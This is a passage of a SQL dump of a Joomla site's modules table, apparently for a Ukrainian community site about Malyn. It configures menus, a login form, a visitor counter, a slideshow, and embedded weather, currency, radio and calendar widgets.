INSERT INTO `fw3gt_modules` VALUES (1,2241,'Main Menu','','',1,'user3',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"mainmenu\",\"base\":\"\",\"startLevel\":1,\"endLevel\":0,\"showAllChildren\":1,\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"_menu\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(2,0,'Login','','',1,'login',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_login',1,1,'',1,'*'),(3,0,'Popular Articles','','',3,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_popular',3,1,'{\"count\":\"5\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(4,0,'Recently Added Articles','','',4,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_latest',3,1,'{\"count\":\"5\",\"ordering\":\"c_dsc\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(8,0,'Toolbar','','',1,'toolbar',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_toolbar',3,1,'',1,'*'),(9,0,'Quick Icons','','',1,'icon',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_quickicon',3,1,'',1,'*'),(10,0,'Logged-in Users','','',2,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_logged',3,1,'{\"count\":\"5\",\"name\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(12,0,'Admin Menu','','',1,'menu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',3,1,'{\"layout\":\"\",\"moduleclass_sfx\":\"\",\"shownew\":\"1\",\"showhelp\":\"1\",\"cache\":\"0\"}',1,'*'),(13,0,'Admin Submenu','','',1,'submenu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_submenu',3,1,'',1,'*'),(14,0,'User Status','','',2,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_status',3,1,'',1,'*'),(15,0,'Title','','',1,'title',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_title',3,1,'',1,'*'),(16,0,'Login Form','','',1,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_login',1,1,'{\"pretext\":\"\",\"posttext\":\"\",\"login\":\"\",\"logout\":\"\",\"greeting\":\"1\",\"name\":\"0\",\"usesecure\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',0,'*'),(17,2254,'Breadcrumbs','','',1,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_breadcrumbs',1,0,'{\"showHere\":1,\"showHome\":1,\"homeText\":\"Home\",\"showLast\":1,\"separator\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(79,0,'Multilanguage status','','',1,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_multilangstatus',3,1,'{\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(86,0,'Joomla Version','','',1,'footer',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_version',3,1,'{\"format\":\"short\",\"product\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(87,2461,'ОСТАННІ НОВИНИ','','',1,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_articles_latest',1,1,'{\"count\":5,\"show_featured\":\"\",\"ordering\":\"c_dsc\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(101,2242,'Інформаційне меню','','',2,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"top\",\"base\":\"\",\"startLevel\":1,\"endLevel\":0,\"showAllChildren\":1,\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(102,2455,'КОНТАКТИ','','',1,'right',0,'0000-00-00 00:00:00','2020-03-30 07:21:16','0000-00-00 00:00:00',0,'mod_menu',1,1,'{\"menutype\":\"top2\",\"base\":203,\"startLevel\":1,\"endLevel\":0,\"showAllChildren\":1,\"tag_id\":\"\",\"class_sfx\":\"art-vmenu\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(120,1617,'Погода','','								<div id=\"SinoptikInformer\" style=\"width:180px;\" class=\"SinoptikInformer type4c1\"><div class=\"siHeader\"><div class=\"siLh\"><div class=\"siMh\"><a onmousedown=\"siClickCount();\" href=\"https://ua.sinoptik.ua/\" target=\"_blank\">Погода</a><a onmousedown=\"siClickCount();\" class=\"siLogo\" href=\"https://ua.sinoptik.ua/\" target=\"_blank\"> </a> </div></div></div><div class=\"siBody\"><div class=\"siTitle\"><span id=\"siHeader\"></span></div><div class=\"siCity\"><div class=\"siCityName\"><a onmousedown=\"siClickCount();\" href=\"https://ua.sinoptik.ua/погода-малин\" target=\"_blank\">Погода у <span>Малині</span></a></div><div id=\"siCont0\" class=\"siBodyContent\"><div class=\"siLeft\"><div class=\"siTerm\"></div><div class=\"siT\" id=\"siT0\"></div><div id=\"weatherIco0\"></div></div><div class=\"siInf\"><p>вологість: <span id=\"vl0\"></span></p><p>тиск: <span id=\"dav0\"></span></p><p>вітер: <span id=\"wind0\"></span></p></div></div></div><div class=\"siLinks\"><span><a onmousedown=\"siClickCount();\" href=\"https://ua.sinoptik.ua/погода-кременчук\" target=\"_blank\">Погода у Кременчуці</a>&nbsp;</span><span><a onmousedown=\"siClickCount();\" href=\"https://ua.sinoptik.ua/погода-мелітополь\" target=\"_blank\">Погода у Мелітополі</a>&nbsp;</span></div></div><div class=\"siFooter\"><div class=\"siLf\"><div class=\"siMf\"></div></div></div></div><script type=\"text/javascript\" charset=\"UTF-8\" src=\"//sinoptik.ua/informers_js.php?title=3&amp;wind=1&amp;cities=303015024&amp;lang=ua\"></script>',3,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":0,\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(121,2444,'Календар','','			<p style=\"text-align: center;\"><a href=\"https://www.dilovamova.com/\"><img alt=\"Календар свят України. Граматика української мови\" border=\"0\" class=\"fr-fin fr-dii\" height=\"250\" src=\"https://www.dilovamova.com/images/wpi.cache/informer/informer.png\" title=\"Календар свят України. Граматика української мови\" width=\"150\"></a><br></p>',4,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":0,\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(126,1611,'бігуща строка','','',1,'banner1',0,'0000-00-00 00:00:00','2022-12-24 11:25:00','2024-01-17 02:09:00',0,'mod_anycode',1,0,'{\"anycode\":\"<marquee bgcolor=\\\"#c0c0c0\\\"direction=\\\"left\\\" style=\\\"color: #f5ff37; font-size: 40px; font-weight: bolder; line-height: 150%; text-shadow: #000000 0px 1px 1px;\\\">\\u0425\\u0430\\u0439 \\u0443 \\u041d\\u043e\\u0432\\u043e\\u043c\\u0443 \\u0440\\u043e\\u0446\\u0456 \\u0437\\u0431\\u0443\\u0434\\u0443\\u0442\\u044c\\u0441\\u044f \\u0432\\u0441\\u0456 \\u0431\\u0430\\u0436\\u0430\\u043d\\u043d\\u044f, \\u0449\\u043e\\u0431\\u0438 \\u0440\\u0456\\u043a \\u043f\\u0440\\u0438\\u043d\\u0456\\u0441 \\u0437\\u0430\\u0432\\u0437\\u044f\\u0442\\u043e \\u0449\\u0430\\u0441\\u0442\\u044f, \\u0440\\u0430\\u0434\\u043e\\u0441\\u0442\\u0456 \\u0431\\u0430\\u0433\\u0430\\u0442\\u043e. \\u0429\\u043e\\u0431 \\u0443\\u0441\\u0435 \\u0437\\u0430\\u0432\\u0436\\u0434\\u0438 \\u0432\\u0434\\u0430\\u0432\\u0430\\u043b\\u043e\\u0441\\u044c, \\u0449\\u043e\\u0431 \\u0432\\u0456\\u0434 \\u0443\\u0441\\u043f\\u0456\\u0445\\u0456\\u0432 \\u0441\\u043f\\u0456\\u0432\\u0430\\u043b\\u043e\\u0441\\u044c, \\u0449\\u043e\\u0431\\u0438 \\u0412\\u0438 \\u0431\\u0443\\u043b\\u0438 \\u0437\\u0434\\u043e\\u0440\\u043e\\u0432\\u0456, \\u0449\\u043e\\u0431 \\u043a\\u0443\\u043f\\u0430\\u043b\\u0438\\u0441\\u044f \\u0432 \\u043b\\u044e\\u0431\\u043e\\u0432\\u0456.\\r\\n!<\\/marquee>\",\"urlsniffer\":\"\",\"browsersniffer\":\"all\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(131,1616,'Translate','','',1,'right',0,'0000-00-00 00:00:00','2020-08-30 13:57:00','0000-00-00 00:00:00',1,'mod_gtranslate',1,0,'{\"moduleclass_sfx\":\"\",\"look\":\"both\",\"language\":\"uk\",\"pro_version\":\"0\",\"enterprise_version\":\"0\",\"flag_size\":\"16\",\"native_language_names\":\"0\",\"new_tab\":\"1\",\"analytics\":\"0\",\"show_af\":\"0\",\"show_sq\":\"0\",\"show_ar\":\"1\",\"show_hy\":\"0\",\"show_az\":\"0\",\"show_eu\":\"0\",\"show_be\":\"1\",\"show_bg\":\"0\",\"show_ca\":\"0\",\"show_zh-CN\":\"0\",\"show_zh-TW\":\"0\",\"show_hr\":\"0\",\"show_cs\":\"1\",\"show_da\":\"1\",\"show_nl\":\"1\",\"show_en\":\"2\",\"show_et\":\"1\",\"show_tl\":\"0\",\"show_fi\":\"1\",\"show_fr\":\"2\",\"show_gl\":\"0\",\"show_ka\":\"1\",\"show_de\":\"2\",\"show_el\":\"1\",\"show_ht\":\"1\",\"show_iw\":\"1\",\"show_hi\":\"0\",\"show_hu\":\"1\",\"show_is\":\"1\",\"show_id\":\"0\",\"show_ga\":\"1\",\"show_it\":\"2\",\"show_ja\":\"1\",\"show_ko\":\"1\",\"show_lv\":\"1\",\"show_lt\":\"1\",\"show_mk\":\"1\",\"show_ms\":\"1\",\"show_mt\":\"1\",\"show_no\":\"1\",\"show_fa\":\"1\",\"show_pl\":\"1\",\"show_pt\":\"2\",\"show_ro\":\"1\",\"show_ru\":\"2\",\"show_sr\":\"1\",\"show_sk\":\"1\",\"show_sl\":\"1\",\"show_es\":\"2\",\"show_sw\":\"1\",\"show_sv\":\"1\",\"show_th\":\"1\",\"show_tr\":\"1\",\"show_uk\":\"1\",\"show_ur\":\"1\",\"show_vi\":\"1\",\"show_cy\":\"1\",\"show_yi\":\"1\",\"show_bn\":\"0\",\"show_bs\":\"0\",\"show_ceb\":\"0\",\"show_eo\":\"0\",\"show_gu\":\"0\",\"show_ha\":\"0\",\"show_hmn\":\"0\",\"show_ig\":\"0\",\"show_jw\":\"0\",\"show_kn\":\"0\",\"show_km\":\"0\",\"show_lo\":\"0\",\"show_la\":\"0\",\"show_mi\":\"0\",\"show_mr\":\"0\",\"show_mn\":\"0\",\"show_ne\":\"0\",\"show_pa\":\"0\",\"show_so\":\"0\",\"show_ta\":\"0\",\"show_te\":\"0\",\"show_yo\":\"0\",\"show_zu\":\"0\",\"show_my\":\"0\",\"show_ny\":\"0\",\"show_kk\":\"0\",\"show_mg\":\"0\",\"show_ml\":\"0\",\"show_si\":\"0\",\"show_st\":\"0\",\"show_su\":\"0\",\"show_tg\":\"0\",\"show_uz\":\"0\",\"show_am\":\"0\",\"show_co\":\"0\",\"show_haw\":\"0\",\"show_ku\":\"0\",\"show_ky\":\"0\",\"show_ld\":\"0\",\"show_ps\":\"0\",\"show_sm\":\"0\",\"show_gd\":\"0\",\"show_sn\":\"0\",\"show_sd\":\"0\",\"show_fy\":\"0\",\"show_xh\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(140,1650,'ZT Visitor Counter module','','',1,'right',0,'0000-00-00 00:00:00','2020-08-27 20:22:19','0000-00-00 00:00:00',1,'mod_zt_visitor_counter',1,0,'{\"moduleclass_sfx\":\"\",\"width\":[\"100\",\"%\"],\"digit_style\":\"style7.css\",\"module_style\":\"calendar.css\",\"showDigit\":\"1\",\"minDigits\":\"7\",\"showIcons\":\"1\",\"showTitles\":\"1\",\"showTotals\":\"1\",\"showIp\":\"Your IP:\",\"showOnline\":\"1\",\"showAgent\":\"1\",\"duration\":\"15\",\"showGuestOnline\":\"1\",\"showMemberOnline\":\"0\",\"showAllOnline\":\"1\",\"initialValue\":\"0\",\"today\":\"\\u0421\\u044c\\u043e\\u0433\\u043e\\u0434\\u043d\\u0456\",\"yesterday\":\"\\u0412\\u0447\\u043e\\u0440\\u0430\",\"thisWeek\":\"\\u0426\\u044c\\u043e\\u0433\\u043e \\u0442\\u0438\\u0436\\u043d\\u044f\",\"lastWeek\":\"\\u041c\\u0438\\u043d\\u0443\\u043b\\u043e\\u0433\\u043e \\u0442\\u0438\\u0436\\u043d\\u044f\",\"thisMonth\":\"\\u0426\\u044c\\u043e\\u0433\\u043e \\u043c\\u0456\\u0441\\u044f\\u0446\\u044f\",\"lastMonth\":\"\\u041c\\u0438\\u043d\\u0443\\u043b\\u043e\\u0433\\u043e \\u043c\\u0456\\u0441\\u044f\\u0446\\u044f\",\"all\":\"\\u0412\\u0441\\u044c\\u043e\\u0433\\u043e\",\"foreCast\":\"\\u041f\\u0440\\u043e\\u0433\\u043d\\u043e\\u0437 \\u0441\\u044c\\u043e\\u0433\\u043e\\u0434\\u043d\\u0456\",\"firstDay\":\"1\",\"cache\":\"0\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"zt-copyright\":\"ICAgIDxkaXYgY2xhc3M9Inp0dmMtY29weXJpZ2h0Ij48YSBocmVmPSJodHRwOi8vd3d3Lnpvb3RlbXBsYXRlLmNvbS8iIHRpdGxlPSJWaXNpdG9yIENvdW50ZXIiIHRhcmdldD0iX2JsYW5rIj5WaXNpdG9yDQogICAgICAgICAgICBDb3VudGVyPC9hPjwvZGl2Pg0KPC9kaXY+\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(142,1843,'Радіо','','											<!--НАЧАЛО БЛОКА РАДИО ОНЛАЙН-->\r\n<div id=\"ro_block\" align=\"center\">\r\n<h2 id=\"ro_h2\"><a href=\"http://radio-online.com.ua/\" target=\"_blank\"><span id=\"transmark\">Українське</span> радіо</a></h2>\r\n<div id=\"ro_player\">&nbsp;</div>\r\n<div id=\"ro_img\">&nbsp;</div>\r\n</div>\r\n<!--КОНЕЦ БЛОКА РАДИО ОНЛАЙН-->\r\n<p>&nbsp;</p>',1,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":0,\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(143,2255,'Пошук по сайту','','',1,'extra2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_search',1,0,'{\"label\":\"\",\"width\":\"\",\"text\":\"\",\"button\":1,\"button_pos\":\"left\",\"imagebutton\":0,\"button_text\":\"\",\"opensearch\":1,\"opensearch_title\":\"\",\"set_itemid\":0,\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(154,2454,'Курси валют','','							<p>{source}  &lt;!--Kurs.com.ua regional 200x370 Житомир blue--&gt;</p><p>&lt;div id=\'kurs-com-ua-informer-regional-200x370-15-jitomir-blue-container\'&gt;&lt;a href=\"//old.kurs.com.ua/ua/informer\" id=\"kurs-com-ua-informer-regional-200x370-15-jitomir-blue\" title=\"Курс валют информер Украина\" rel=\"nofollow\" target=\"_blank\"&gt;Информер курса валют&lt;/a&gt;&lt;/div&gt;</p><p>&lt;script type=\'text/javascript\'&gt;</p><p>(function() {var iframe = \'&lt;ifr\'+\'ame src=\"//old.kurs.com.ua/ua/informer/regional2/15/703?color=blue\" width=\"200\" height=\"370\" frameborder=\"0\" vspace=\"0\" scrolling=\"no\" hspace=\"0\"&gt;&lt;/ifr\'+\'ame&gt;\';var container = document.getElementById(\'kurs-com-ua-informer-regional-200x370-15-jitomir-blue\');container.parentNode.innerHTML = iframe;})();</p><p>&lt;/script&gt;</p><p>&lt;noscript&gt;&lt;img src=\'//old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в Украине!\' title=\'Курс валют\' border=\'0\' /&gt;&lt;/noscript&gt;</p><p>&lt;!--//Kurs.com.ua regional 240x370 Житомир blue--&gt;{/source}  </p><noscript>&lt;iframe class=\"infFrame\" frameborder=\"0\" height=\"270\" hspace=\"0\" scrolling=\"no\" src=\"//old.kurs.com.ua/ua/informer/regional2/10/908?color=blue\" vspace=\"0\" width=\"240\"&gt;&lt;/iframe&gt;&amp;lt;img src=\"//old.kurs.com.ua/static/images/informer/kurs.png\" width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в Украине!\' title=\'Курс валют\' border=\'0\' /&amp;gt;</noscript>',6,'right',0,'0000-00-00 00:00:00','2018-10-30 14:21:55','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":1,\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(158,2459,'Слайди - Малин','','',1,'user4',0,'0000-00-00 00:00:00','2018-10-31 08:42:41','0000-00-00 00:00:00',-2,'mod_image_show_gk4',1,1,'{\"automatic_module_id\":\"1\",\"module_id\":\"gk-is-1\",\"moduleclass_sfx\":\"\",\"module_style\":\"gk_bikestore\",\"last_modification\":\"1598783560\",\"image_show_data\":\"[{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000002.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000003.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000004.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000005.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000006.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"}]\",\"config\":\"{\\\"gk_bikestore\\\":{\\\"gk_bikestore_image_width\\\":\\\"640\\\",\\\"gk_bikestore_image_height\\\":\\\"480\\\",\\\"gk_bikestore_image_bg\\\":\\\"#D3D3D3\\\",\\\"gk_bikestore_quality\\\":\\\"100\\\",\\\"gk_bikestore_show_title_block\\\":\\\"1\\\",\\\"gk_bikestore_title_block_position\\\":\\\"bottom\\\",\\\"gk_bikestore_title_block_position_x\\\":\\\"left\\\",\\\"gk_bikestore_title_block_length\\\":\\\"30\\\",\\\"gk_bikestore_pagination\\\":\\\"1\\\",\\\"gk_bikestore_pagination_position\\\":\\\"top\\\",\\\"gk_bikestore_slide_links\\\":\\\"1\\\",\\\"gk_bikestore_animation_speed\\\":\\\"500\\\",\\\"gk_bikestore_animation_interval\\\":\\\"5000\\\",\\\"gk_bikestore_autoanimation\\\":\\\"1\\\"},\\\"gk_bluap\\\":{\\\"gk_bluap_image_width\\\":\\\"640\\\",\\\"gk_bluap_image_height\\\":\\\"320\\\",\\\"gk_bluap_image_bg\\\":\\\"#000000\\\",\\\"gk_bluap_quality\\\":\\\"95\\\",\\\"gk_bluap_text_block_width\\\":\\\"50\\\",\\\"gk_bluap_text_block_position\\\":\\\"left\\\",\\\"gk_bluap_pagination\\\":\\\"1\\\",\\\"gk_bluap_animation_speed\\\":\\\"500\\\",\\\"gk_bluap_animation_interval\\\":\\\"5000\\\",\\\"gk_bluap_autoanimation\\\":\\\"1\\\"},\\\"gk_box\\\":{\\\"gk_box_image_width\\\":\\\"780\\\",\\\"gk_box_image_height\\\":\\\"860\\\",\\\"gk_box_thumb_width\\\":\\\"80\\\",\\\"gk_box_thumb_height\\\":\\\"92\\\",\\\"gk_box_image_bg\\\":\\\"#ffffff\\\",\\\"gk_box_quality\\\":\\\"95\\\",\\\"gk_box_show_text_block\\\":\\\"1\\\",\\\"gk_box_text_block_length\\\":\\\"80\\\",\\\"gk_box_pagination\\\":\\\"1\\\",\\\"gk_box_slide_links\\\":\\\"1\\\",\\\"gk_box_animation_speed\\\":\\\"500\\\",\\\"gk_box_animation_interval\\\":\\\"5000\\\",\\\"gk_box_autoanimation\\\":\\\"1\\\"},\\\"gk_creativity\\\":{\\\"gk_creativity_image_width\\\":\\\"640\\\",\\\"gk_creativity_image_height\\\":\\\"320\\\",\\\"gk_creativity_image_bg\\\":\\\"#000000\\\",\\\"gk_creativity_quality\\\":\\\"95\\\",\\\"gk_creativity_title_anim\\\":\\\"none\\\",\\\"gk_creativity_text_anim\\\":\\\"none\\\",\\\"gk_creativity_bganim\\\":\\\"opacity\\\",\\\"gk_creativity_pagination\\\":\\\"1\\\",\\\"gk_creativity_animation_speed\\\":\\\"500\\\",\\\"gk_creativity_animation_interval\\\":\\\"5000\\\",\\\"gk_creativity_autoanimation\\\":\\\"1\\\"},\\\"gk_fashion\\\":{\\\"gk_fashion_image_width\\\":\\\"640\\\",\\\"gk_fashion_image_height\\\":\\\"320\\\",\\\"gk_fashion_image_bg\\\":\\\"#000000\\\",\\\"gk_fashion_quality\\\":\\\"95\\\",\\\"gk_fashion_show_title_block\\\":\\\"1\\\",\\\"gk_fashion_title_block_position\\\":\\\"bottom\\\",\\\"gk_fashion_title_block_length\\\":\\\"30\\\",\\\"gk_fashion_pagination\\\":\\\"1\\\",\\\"gk_fashion_pagination_position\\\":\\\"top\\\",\\\"gk_fashion_slide_links\\\":\\\"1\\\",\\\"gk_fashion_animation_speed\\\":\\\"500\\\",\\\"gk_fashion_animation_interval\\\":\\\"5000\\\",\\\"gk_fashion_autoanimation\\\":\\\"1\\\"},\\\"gk_game\\\":{\\\"gk_game_image_width\\\":\\\"2080\\\",\\\"gk_game_image_height\\\":\\\"936\\\",\\\"gk_game_margin_bottom\\\":\\\"430\\\",\\\"gk_game_tablet_image_width\\\":\\\"1040\\\",\\\"gk_game_tablet_image_height\\\":\\\"468\\\",\\\"gk_game_tablet_margin_bottom\\\":\\\"215\\\",\\\"gk_game_mobile_image_width\\\":\\\"570\\\",\\\"gk_game_mobile_image_height\\\":\\\"234\\\",\\\"gk_game_mobile_margin_bottom\\\":\\\"107\\\",\\\"gk_game_image_bg\\\":\\\"#000000\\\",\\\"gk_game_quality\\\":\\\"95\\\",\\\"gk_game_show_title_block\\\":\\\"1\\\",\\\"gk_game_animation_loop\\\":\\\"1\\\",\\\"gk_game_slide_links\\\":\\\"1\\\",\\\"gk_game_animation_speed\\\":\\\"500\\\",\\\"gk_game_animation_interval\\\":\\\"5000\\\"},\\\"gk_hotel_tabs\\\":{\\\"gk_hotel_tabs_image_width\\\":\\\"2000\\\",\\\"gk_hotel_tabs_image_height\\\":\\\"720\\\",\\\"gk_hotel_tabs_tablet_image_width\\\":\\\"1040\\\",\\\"gk_hotel_tabs_tablet_image_height\\\":\\\"720\\\",\\\"gk_hotel_tabs_mobile_image_width\\\":\\\"640\\\",\\\"gk_hotel_tabs_mobile_image_height\\\":\\\"540\\\",\\\"gk_hotel_tabs_image_bg\\\":\\\"#000000\\\",\\\"gk_hotel_tabs_quality\\\":\\\"95\\\",\\\"gk_hotel_tabs_mode\\\":\\\"slideshow\\\",\\\"gk_hotel_tabs_show_title_block\\\":\\\"1\\\",\\\"gk_hotel_tabs_show_button\\\":\\\"1\\\",\\\"gk_hotel_tabs_prev_next\\\":\\\"0\\\",\\\"gk_hotel_tabs_pagination\\\":\\\"disabled\\\",\\\"gk_hotel_tabs_animation_loop\\\":\\\"1\\\",\\\"gk_hotel_tabs_slide_links\\\":\\\"1\\\",\\\"gk_hotel_tabs_animation_speed\\\":\\\"500\\\",\\\"gk_hotel_tabs_animation_interval\\\":\\\"5000\\\"},\\\"gk_musicstate\\\":{\\\"gk_musicstate_image_width\\\":\\\"640\\\",\\\"gk_music